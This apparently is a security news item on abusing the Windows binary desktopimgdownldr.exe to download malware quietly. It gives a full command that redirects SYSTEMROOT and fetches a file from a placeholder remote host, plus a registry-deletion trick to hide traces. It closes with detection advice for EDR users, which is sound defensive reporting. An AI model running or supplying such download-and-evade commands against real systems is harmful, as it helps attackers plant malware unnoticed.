A binary in Windows 10 responsible for setting an image for the desktop and lock screen can help attackers download malware on a compromised system without raising the alarm.
Known as living-off-the-land binaries (LoLBins), these files come with the operating system and have a legitimate purpose. Attackers of all colors are abusing them in post-exploitation phases to hide malicious activity.
The new LoL in the Bin
An attacker can use LoLBins to download and install malware, bypass security controls such as UAC or WDAC. Typically, the attack involves fileless malware and reputable cloud services.
A list of 13 Windows native executables that can download and execute malicious code:
The executable is part of the Personalization CSP (configuration service provider) that allows, among others, defining the lock screen and desktop background images.
In both cases, the setting accepts JPG, JPEG, PNG files that are stored locally or remotely (supports HTTP/S URLs).
Running desktopimgdownldr.exe with administrator privileges overrules the user-defined lock screen image, alerting of something suspicious.
This can be avoided, though, if the attacker deletes a registry value immediately after running executing the binary, leaving the user none the wiser.
Executable appears to require high privileges (admin) so that it can create files in C:\Windows and in the registry, it can also run as a standard user to download files from an external source.
This is possible by changing the location of the %systemroot% environment variable before executing the binary. This results in modifying the download destination and bypassing access checks.
set “SYSTEMROOT=C:\Windows\Temp” && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Without administrator rights, writing to the registry is not possible, so the lock screen image remains unchanged. In this scenario, the method creates no other artifacts than the downloaded file.
Executable uses BITS COM Object to download a file and on some machines it tries to locate the COM+ Registration Catalog in the %systemroot% location. Since the attacker changes the environment variable, the attempt fails.
Users of Endpoint Detection and Response solutions to add “desktopimgdownldr.exe” to their queries and watchlists and treat it just like “certutil.exe,” a widely used LoLBin, by both advanced hackers doing a government’s bidding and cybercriminals set on scoring big money.